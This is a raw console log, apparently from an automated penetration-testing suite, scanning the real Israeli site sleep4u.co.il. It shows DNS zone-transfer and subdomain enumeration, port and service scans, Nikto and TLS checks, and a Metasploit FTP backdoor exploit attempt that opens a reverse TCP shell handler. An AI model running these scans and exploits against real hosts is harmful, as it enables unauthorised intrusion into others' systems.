  797. mailgw2.spd.co.il. 38400 IN A 192.116.71.71
  798. 
  799.  
  800. Trying Zone Transfers and getting Bind Versions:
  801. _________________________________________________
  802.  
  803. 
  804. Trying Zone Transfer for sleep4u.co.il on ns1.spd.co.il ...
  805.  
  806. Trying Zone Transfer for sleep4u.co.il on ns2.spd.co.il ...
  807.  
  808. brute force file not specified, bay.
  809.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  810. 
  811. ____ _ _ _ _ _____
  812. / ___| _ _| |__ | (_)___| |_|___ / _ __
  813. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  814. ___) | |_| | |_) | | \__ \ |_ ___) | |
  815. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  816.  
  817. # Coded By Ahmed Aboul-Ela - @aboul3la
  818.  
  819. [-] Enumerating subdomains now for sleep4u.co.il
  820. [-] verbosity is enabled, will show the subdomains results in realtime
  821. [-] Searching now in Baidu..
  822. [-] Searching now in Yahoo..
  823. [-] Searching now in Google..
  824. [-] Searching now in Bing..
  825. [-] Searching now in Ask..
  826. [-] Searching now in Netcraft..
  827. [-] Searching now in DNSdumpster..
  828. [-] Searching now in Virustotal..
  829. [-] Searching now in ThreatCrowd..
  830. [-] Searching now in SSL Certificates..
  831. [-] Searching now in PassiveDNS..
  832. Yahoo: www.sleep4u.co.il
  833. Virustotal: www.sleep4u.co.il
  834. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-sleep4u.co.il.txt
  835. [-] Total Unique Subdomains Found: 1
  836. www.sleep4u.co.il
  837.  
  838.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  839.  ║ ╠╦╝ ║ ╚═╗╠═╣
  840.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  841.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  842. 
  843.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-sleep4u.co.il-full.txt
  844. 
  845.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  846.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  847.  
  848.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  849. PING sleep4u.co.il (62.128.59.221) 56(84) bytes of data.
  850.  
  851. --- sleep4u.co.il ping statistics ---
  852. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  853.  
  854.  
  855.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  856.  
  857. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 21:28 EST
  858. Warning: 62.128.59.221 giving up on port because retransmission cap hit (2).
  859. Nmap scan report for sleep4u.co.il (62.128.59.221)
  860. Host is up (1.3s latency).
  861. rDNS record for 62.128.59.221: kiwi.spd.co.il
  862. Not shown: 464 filtered ports
  863. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  864. PORT STATE SERVICE
  865. 21/tcp open ftp
  866. 53/tcp open domain
  867. 80/tcp open http
  868. 110/tcp open pop3
  869. 143/tcp open imap
  870. 443/tcp open https
  871. 993/tcp open imaps
  872. 995/tcp open pop3s
  873. 2222/tcp open EtherNetIP-1
  874.  
  875. Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
  876.  
  877.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  878.  + -- --=[Port 21 opened... running tests...
  879.  
  880. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 21:28 EST
  881. Nmap scan report for sleep4u.co.il (62.128.59.221)
  882. Host is up (0.99s latency).
  883. rDNS record for 62.128.59.221: kiwi.spd.co.il
  884.  
  885. PORT STATE SERVICE VERSION
  886. 21/tcp filtered ftp
  887. Too many fingerprints match this host to give specific OS details
  888. Network Distance: 22 hops
  889.  
  890. TRACEROUTE (using proto 1/icmp)
  891. HOP RTT ADDRESS
  892. 1 412.12 ms 10.13.0.1
  893. 2 426.61 ms 37.187.24.253
  894. 3 419.33 ms 10.50.225.60
  895. 4 422.83 ms 10.17.129.42
  896. 5 415.58 ms 10.73.0.54
  897. 6 429.57 ms 10.95.33.10
  898. 7 449.84 ms be100-1111.ldn-5-a9.uk.eu (213.251.128.65)
  899. 8 435.82 ms 195.66.226.60
  900. 9 439.32 ms EDGE-LON-MX-02-ae0-102.ip4.012.net.il (80.179.165.106)
  901. 10 455.56 ms 80.179.165.222.static.012.net.il (80.179.165.222)
  902. 11 ...
  903. 12 238.90 ms 62.128.59.2.static.hosting.spd.co.il (62.128.59.2)
  904. 13 ... 21
  905. 22 988.04 ms kiwi.spd.co.il (62.128.59.221)
  906.  
  907. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  908. Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds
  909. 
  910. .,,. .
  911. .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
  912. d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
  913. d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
  914. d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
  915. 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
  916. d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
  917. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
  918. .a#$$$$$$"` 88b d8P 88b`?8888P'
  919. ,s$$$$$$$"` 888888P' 88n _.,,,ass;:
  920. .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
  921. .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
  922. ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
  923. .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
  924. _______________________________________________________________ ,&$$$$$$'_____
  925. ll&&$$$$'
  926. .;;lll&&&&'
  927. ...;;lllll&'
  928. ......;;;llll;;;....
  929. ` ......;;;;... . .
  930. 
  931.  
  932. =[ metasploit v4.16.26-dev ]
  933. + -- --=[ 1714 exploits - 975 auxiliary - 300 post ]
  934. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  935. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  936.  
  937. RHOST => sleep4u.co.il
  938. RHOSTS => sleep4u.co.il
  939. [*] sleep4u.co.il:21 - Banner: 220 FTP Server
  940. [*] sleep4u.co.il:21 - USER: 331 Password required for WIJ:)
  941. [*] Exploit completed, but no session was created.
  942. [*] Started reverse TCP double handler on 10.13.2.94:4444
  943. [*] sleep4u.co.il:21 - Sending Backdoor Command
  944. [-] sleep4u.co.il:21 - Not backdoored
  945. [*] Exploit completed, but no session was created.
  946.  + -- --=[Port 22 closed... skipping.
  947.  + -- --=[Port 23 closed... skipping.
  948.  + -- --=[Port 25 closed... skipping.
  949.  + -- --=[Port 53 opened... running tests...
  950.  
  951. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 21:29 EST
  952. Nmap scan report for sleep4u.co.il (62.128.59.221)
  953. Host is up (0.26s latency).
  954. rDNS record for 62.128.59.221: kiwi.spd.co.il
  955.  
  956. PORT STATE SERVICE VERSION
  957. 53/udp open domain ISC BIND 6.6.6
  958. |_dns-cache-snoop: 0 of 100 tested domains are cached.
  959. |_dns-fuzz: The server seems impervious to our assault.
  960. | dns-nsec-enum:
  961. |_ No NSEC records found
  962. | dns-nsec3-enum:
  963. |_ DNSSEC NSEC3 not supported
  964. | dns-nsid:
  965. |_ bind.version: 6.6.6
  966. Too many fingerprints match this host to give specific OS details
  967. Network Distance: 13 hops
  968.  
  969. Host script results:
  970. | dns-brute:
  971. | DNS Brute-force hostnames:
  972. | host.co.il - 148.251.90.173
  973. | development.co.il - 46.101.238.24
  974. | http.co.il - 212.150.243.210
  975. | images.co.il - 67.23.177.200
  976. | mysql.co.il - 216.239.32.21
  977. | mysql.co.il - 216.239.34.21
  978. | mysql.co.il - 216.239.36.21
  979. | mysql.co.il - 216.239.38.21
  980. | test.co.il - 127.0.0.1
  981. | info.co.il - 104.31.92.2
  982. | info.co.il - 104.31.93.2
  983. | info.co.il - 2400:cb00:2048:1:0:0:681f:5c02
  984. | info.co.il - 2400:cb00:2048:1:0:0:681f:5d02
  985. | news.co.il - 188.166.109.104
  986. | test1.co.il - 192.185.236.196
  987. | internet.co.il - 95.175.32.10
  988. | noc.co.il - 96.31.35.145
  989. | test2.co.il - 209.88.192.216
  990. | dns.co.il - 82.80.253.15
  991. | intra.co.il - 62.219.78.158
  992. | testing.co.il - 192.117.125.106
  993. | intranet.co.il - 194.90.1.109
  994. | upload.co.il - 192.185.139.151
  995. | ns1.co.il - 178.32.55.171
  996. | download.co.il - 148.251.90.173
  997. | ns2.co.il - 92.222.209.88
  998. | vnc.co.il - 194.90.1.109
  999. | ntp.co.il - 107.154.156.178
  1000. | ntp.co.il - 107.154.163.178
  1001. | erp.co.il - 69.163.219.179
  1002. | voip.co.il - 212.179.240.8
  1003. | ops.co.il - 108.167.143.8
  1004. | exchange.co.il - 181.215.116.38
  1005. | owa.co.il - 212.29.214.195
  1006. | pbx.co.il - 185.18.204.26
  1007. | secure.co.il - 62.219.17.162
  1008. | server.co.il - 148.251.90.173
  1009. | shop.co.il - 188.166.109.104
  1010. | sip.co.il - 213.8.172.5
  1011. | linux.co.il - 81.218.80.235
  1012. | sql.co.il - 192.254.237.210
  1013. | local.co.il - 173.212.236.162
  1014. | log.co.il - 82.80.201.26
  1015. | squid.co.il - 23.99.97.249
  1016. | ssh.co.il - 81.218.229.185
  1017. | ssl.co.il - 82.80.253.21
  1018. | stage.co.il - 52.58.94.54
  1019. | manage.co.il - 192.117.172.13
  1020. | mobile.co.il - 182.50.132.56
  1021. | monitor.co.il - 194.90.1.109
  1022. | mta.co.il - 212.199.167.22
  1023. | web.co.il - 192.115.21.75
  1024. | whois.co.il - 109.74.198.188
  1025. | www2.co.il - 64.90.49.227
  1026. | adserver.co.il - 195.128.177.33
  1027. | alpha.co.il - 34.248.159.186
  1028. | alpha.co.il - 54.229.170.136
  1029. | firewall.co.il - 62.219.67.17
  1030. | forum.co.il - 62.219.11.147
  1031. | ftp.co.il - 198.23.57.32
  1032. | git.co.il - 81.218.229.200
  1033. | help.co.il - 82.80.209.181
  1034. | home.co.il - 104.31.84.173
  1035. | home.co.il - 104.31.85.173
  1036. | home.co.il - 2400:cb00:2048:1:0:0:681f:54ad
  1037. | home.co.il - 2400:cb00:2048:1:0:0:681f:55ad
  1038. | app.co.il - 82.80.73.209
  1039. | apps.co.il - 72.52.4.122
  1040. | beta.co.il - 185.70.251.47
  1041. | blog.co.il - 212.143.60.51
  1042. | chat.co.il - 95.175.47.103
  1043. | citrix.co.il - 165.160.13.20
  1044. | citrix.co.il - 165.160.15.20
  1045. | cms.co.il - 194.90.203.76
  1046. | corp.co.il - 204.93.178.102
  1047. | crs.co.il - 136.243.93.246
  1048. | cvs.co.il - 194.90.8.80
  1049. | demo.co.il - 212.235.14.43
  1050. |_ dev.co.il - 84.94.227.90
  1051.  
  1052. TRACEROUTE (using port 53/udp)
  1053. HOP RTT ADDRESS
  1054. 1 110.70 ms 10.13.0.1
  1055. 2 111.38 ms 37.187.24.253
  1056. 3 110.71 ms 10.50.225.60
  1057. 4 111.37 ms 10.17.129.44
  1058. 5 110.69 ms 10.73.0.50
  1059. 6 ...
  1060. 7 113.93 ms be100-1111.ldn-5-a9.uk.eu (213.251.128.65)
  1061. 8 113.73 ms 195.66.226.60
  1062. 9 113.71 ms 195.66.226.60
  1063. 10 ...
  1064. 11 179.83 ms 62.128.59.2.static.hosting.spd.co.il (62.128.59.2)
  1065. 12 179.85 ms 62.128.59.2.static.hosting.spd.co.il (62.128.59.2)
  1066. 13 598.44 ms kiwi.spd.co.il (62.128.59.221)
  1067.  
  1068. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1069. Nmap done: 1 IP address (1 host up) scanned in 613.52 seconds
  1070.  + -- --=[Port 79 closed... skipping.
  1071.  + -- --=[Port 80 opened... running tests...
  1072.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  1073.  
  1074. ^ ^
  1075. _ __ _ ____ _ __ _ _ ____
  1076. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1077. | V V // o // _/ | V V // 0 // 0 // _/
  1078. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1079. <
  1080. ...'
  1081.  
  1082. WAFW00F - Web Application Firewall Detection Tool
  1083.  
  1084. By Sandro Gauci && Wendel G. Henrique
  1085.  
  1086. Checking http://sleep4u.co.il
  1087. Generic Detection results:
  1088. No WAF detected by the generic detection
  1089. Number of requests: 13
  1090.  
  1091.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  1092. http://sleep4u.co.il [307 Temporary Redirect] Cookies[SPDTC], Country[ISRAEL][IL], HTTPServer[nginx], IP[62.128.59.221], RedirectLocation[http://sleep4u.co.il/], Title[307 Temporary Redirect], UncommonHeaders[x-rocket-nginx-bypass], nginx
  1093.  
  1094.  __ ______ _____ 
  1095.  \ \/ / ___|_ _|
  1096.  \ /\___ \ | | 
  1097.  / \ ___) || | 
  1098.  /_/\_|____/ |_| 
  1099.  
  1100. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1101. + -- --=[Target: sleep4u.co.il:80
  1102. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1103. + -- --=[Site not vulnerable to Host Header Injection!
  1104.  
  1105.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  1106. + -- --=[Checking if X-Content options are enabled on sleep4u.co.il... 
  1107.  
  1108. + -- --=[Checking if X-Frame options are enabled on sleep4u.co.il... 
  1109.  
  1110. + -- --=[Checking if X-XSS-Protection header is enabled on sleep4u.co.il... 
  1111.  
  1112. + -- --=[Checking HTTP methods on sleep4u.co.il... 
  1113.  
  1114. + -- --=[Checking if TRACE method is enabled on sleep4u.co.il... 
  1115.  
  1116. + -- --=[Checking for META tags on sleep4u.co.il... 
  1117.  
  1118. + -- --=[Checking for open proxy on sleep4u.co.il... 
  1119.  
  1120. + -- --=[Enumerating software on sleep4u.co.il... 
  1121. Server: nginx
  1122.  
  1123. + -- --=[Checking if Strict-Transport-Security is enabled on sleep4u.co.il... 
  1124.  
  1125. + -- --=[Checking for Flash cross-domain policy on sleep4u.co.il... 
  1126.  
  1127. + -- --=[Checking for Silverlight cross-domain policy on sleep4u.co.il... 
  1128.  
  1129. + -- --=[Checking for HTML5 cross-origin resource sharing on sleep4u.co.il... 
  1130.  
  1131. + -- --=[Retrieving robots.txt on sleep4u.co.il... 
  1132. User-agent: *
  1133. Disallow: /cgi-bin/
  1134. Disallow: /tmp/
  1135.  
  1136. + -- --=[Retrieving sitemap.xml on sleep4u.co.il... 
  1137. <changefreq>weekly</changefreq>
  1138. <priority>0.6</priority>
  1139. </url>
  1140. <url>
  1141. <loc>http://www.sleep4u.co.il/%d7%9e%d7%96%d7%a8%d7%95%d7%a0%d7%99%d7%9d/%d7%9e%d7%96%d7%a8%d7%95%d7%a0%d7%99-%d7%a1%d7%95%d7%a4%d7%a8-%d7%a0%d7%99%d7%99%d7%98</loc>
  1142. <lastmod>2009-04-21T13:53:27+00:00</lastmod>
  1143. <changefreq>weekly</changefreq>
  1144. <priority>0.6</priority>
  1145. </url>
  1146. </urlset>
  1147. + -- --=[Checking cookie attributes on sleep4u.co.il... 
  1148. Set-Cookie: SPDTC=cc4a1ddde199e595e27b373799c52bb2; path=/
  1149.  
  1150. + -- --=[Checking for ASP.NET Detailed Errors on sleep4u.co.il... 
  1151.  
  1152. 
  1153.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  1154. - Nikto v2.1.6
  1155. ---------------------------------------------------------------------------
  1156. + Target IP: 62.128.59.221
  1157. + Target Hostname: sleep4u.co.il
  1158. + Target Port: 80
  1159. + Start Time: 2017-12-30 21:41:09 (GMT-5)
  1160. ---------------------------------------------------------------------------
  1161. + Server: nginx
  1162. + Cookie SPDTC created without the httponly flag
  1163. + The anti-clickjacking X-Frame-Options header is not present.
  1164. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1165. + Uncommon header 'x-rocket-nginx-bypass' found, with contents: No
  1166. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1167. + Root page / redirects to: http://sleep4u.co.il/
  1168. + No CGI Directories found (use '-C all' to force check all possible dirs)
  1169. + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x4f4e0502 0x32
  1170. + "robots.txt" contains 2 entries which should be manually viewed.
  1171. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  1172. + OSVDB-3092: /license.txt: License file found may identify site software.
  1173. + 9131 requests: 7 error(s) and 9 item(s) reported on remote host
  1174. + End Time: 2017-12-30 22:18:18 (GMT-5) (2229 seconds)
  1175. ---------------------------------------------------------------------------
  1176. + 1 host(s) tested
  1177.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  1178. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/sleep4u.co.il-port80.jpg
  1179.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  1180.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  1181.  
  1182.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  1183.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  1184.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  1185.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  1186.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  1187.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  1188.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  1189.  
  1190. __[ ! ] Neither war between hackers, nor peace for the system.
  1191. __[ ! ] http://blog.inurl.com.br
  1192. __[ ! ] http://fb.com/InurlBrasil
  1193. __[ ! ] http://twitter.com/@googleinurl
  1194. __[ ! ] http://github.com/googleinurl
  1195. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  1196. __[ ! ] Current script owner::[ root ]
  1197. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  1198. __[ ! ] Current pwd::[ /usr/share/sniper ]
  1199. __[ ! ] Help: php inurlbr.php --help
  1200. ------------------------------------------------------------------------------------------------------------------------
  1201.  
  1202. [ ! ] Starting SCANNER INURLBR 2.1 at [30-12-2017 22:20:26]
  1203. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1204. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1205. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1206.  
  1207. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-sleep4u.co.il.txt ]
  1208. [ INFO ][ DORK ]::[ site:sleep4u.co.il ]
  1209. [ INFO ][ SEARCHING ]:: {
  1210. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.cn ]
  1211.  
  1212. [ INFO ][ SEARCHING ]:: 
  1213. -[:::]
  1214. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1215.  
  1216. [ INFO ][ SEARCHING ]:: 
  1217. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1218. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.as ID: 006748068166572874491:55ez0c3j3ey ]
  1219.  
  1220. [ INFO ][ SEARCHING ]:: 
  1221. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1222.  
  1223. [ INFO ][ TOTAL FOUND VALUES ]:: [ 1 ]
  1224.  
  1225. 
  1226.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1227. |_[ + ] [ 0 / 1 ]-[22:20:40] [ - ] 
  1228. |_[ + ] Target:: [ http://www.miibeian.gov.cn/ ]
  1229. |_[ + ] Exploit:: 
  1230. |_[ + ] Information Server:: , , IP::0 
  1231. |_[ + ] More details:: 
  1232. |_[ + ] Found:: UNIDENTIFIED
  1233. |_[ + ] ERROR CONECTION:: Failed to connect to www.miibeian.gov.cn port 80: Connection timed out
  1234.  
  1235. [ INFO ] [ Shutting down ]
  1236. [ INFO ] [ End of process INURLBR at [30-12-2017 22:20:40]
  1237. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1238. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-sleep4u.co.il.txt ]
  1239. |_________________________________________________________________________________________
  1240.  
  1241. \_________________________________________________________________________________________/
  1242.  
  1243.  + -- --=[Port 110 opened... running tests...
  1244.  
  1245. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 22:20 EST
  1246. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  1247. Nmap done: 1 IP address (0 hosts up) scanned in 1.95 seconds
  1248.  + -- --=[Port 111 closed... skipping.
  1249.  + -- --=[Port 135 closed... skipping.
  1250.  + -- --=[Port 139 closed... skipping.
  1251.  + -- --=[Port 161 closed... skipping.
  1252.  + -- --=[Port 162 closed... skipping.
  1253.  + -- --=[Port 389 closed... skipping.
  1254.  + -- --=[Port 443 opened... running tests...
  1255.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  1256.  
  1257. ^ ^
  1258. _ __ _ ____ _ __ _ _ ____
  1259. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1260. | V V // o // _/ | V V // 0 // 0 // _/
  1261. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1262. <
  1263. ...'
  1264.  
  1265. WAFW00F - Web Application Firewall Detection Tool
  1266.  
  1267. By Sandro Gauci && Wendel G. Henrique
  1268.  
  1269. Checking https://sleep4u.co.il
  1270.  
  1271.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  1272.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  1273. https://sleep4u.co.il [307 Temporary Redirect] Cookies[SPDTC], Country[ISRAEL][IL], HTTPServer[nginx], IP[62.128.59.221], RedirectLocation[https://sleep4u.co.il/], Title[307 Temporary Redirect], UncommonHeaders[x-rocket-nginx-bypass], nginx
  1274.  
  1275.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  1276. Version: 1.11.10-static
  1277. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1278. 
  1279. Testing SSL server sleep4u.co.il on port 443 using SNI name sleep4u.co.il
  1280.  
  1281. TLS Fallback SCSV:
  1282. Server supports TLS Fallback SCSV
  1283.  
  1284. TLS renegotiation:
  1285. Secure session renegotiation supported
  1286.  
  1287. TLS Compression:
  1288. Compression disabled
  1289.  
  1290. Heartbleed:
  1291. TLS 1.2 not vulnerable to heartbleed
  1292. TLS 1.1 not vulnerable to heartbleed
  1293. TLS 1.0 not vulnerable to heartbleed
  1294.  
  1295. Supported Server Cipher(s):
  1296. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
  1297. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
  1298. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256  DHE 2048 bits
  1299. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384  DHE 2048 bits
  1300. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1301. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1302. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1303. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1304. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  1305. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1306. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  1307. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1308. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1309. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1310. Accepted TLSv1.2 128 bits AES128-SHA256
  1311. Accepted TLSv1.2 256 bits AES256-SHA256
  1312. Accepted TLSv1.2 128 bits AES128-SHA
  1313. Accepted TLSv1.2 256 bits AES256-SHA
  1314. Accepted TLSv1.2 256 bits ECDHE-RSA-CAMELLIA256-SHA384 Curve P-256 DHE 256
  1315. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA256 DHE 2048 bits
  1316. Accepted TLSv1.2 128 bits ECDHE-RSA-CAMELLIA128-SHA256 Curve P-256 DHE 256
  1317. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA256 DHE 2048 bits
  1318. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  1319. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  1320. Accepted TLSv1.2 256 bits CAMELLIA256-SHA256
  1321. Accepted TLSv1.2 128 bits CAMELLIA128-SHA256
  1322. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  1323. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  1324. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1325. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1326. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1327. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1328. Accepted TLSv1.1 128 bits AES128-SHA
  1329. Accepted TLSv1.1 256 bits AES256-SHA
  1330. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  1331. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  1332. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  1333. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  1334. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1335. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1336. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1337. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1338. Accepted TLSv1.0 128 bits AES128-SHA
  1339. Accepted TLSv1.0 256 bits AES256-SHA
  1340. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  1341. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  1342. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  1343. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  1344.  
  1345. SSL Certificate:
  1346. Signature Algorithm: sha256WithRSAEncryption
  1347. RSA Key Strength: 4096
  1348.  
  1349. Subject: *.spd.co.il
  1350. Altnames: DNS:*.spd.co.il, DNS:spd.co.il
  1351. Issuer: RapidSSL SHA256 CA - G2
  1352.  
  1353. Not valid before: Jul 4 00:00:00 2016 GMT
  1354. Not valid after: Jul 4 23:59:59 2019 GMT
  1355. 
  1356. ###########################################################
  1357. testssl 2.9dev from https://testssl.sh/dev/
  1358. 
  1359. This program is free software. Distribution and
  1360. modification under GPLv2 permitted.
  1361. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  1362.  
  1363. Please file bugs @ https://testssl.sh/bugs/
  1364. 
  1365. ###########################################################
  1366.  
  1367. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  1368. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  1369. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  1370.  
  1371.  
  1372.  Start 2017-12-30 22:22:02 -->> 62.128.59.221:443 (sleep4u.co.il) <<--
  1373.  
  1374. rDNS (62.128.59.221): kiwi.spd.co.il.
  1375. Service detected: HTTP
  1376.  
  1377.  
  1378.  Testing protocols via sockets except SPDY+HTTP2 
  1379.  
  1380.  SSLv2 not offered (OK)
  1381.  SSLv3 not offered (OK)
  1382.  TLS 1 offered
  1383.  TLS 1.1 offered
  1384.  TLS 1.2 offered (OK)
  1385.  TLS 1.3 not offered
  1386.  SPDY/NPN h2, http/1.1 (advertised)
  1387.  HTTP2/ALPN h2, http/1.1 (offered)
  1388.  
  1389.  Testing ~standard cipher categories 
  1390.  
  1391.  NULL ciphers (no encryption) not offered (OK)
  1392.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  1393.  Export ciphers (w/o ADH+NULL) not offered (OK)
  1394.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  1395.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  1396.  Triple DES Ciphers (Medium) not offered (OK)
  1397.  High encryption (AES+Camellia, no AEAD) offered (OK)
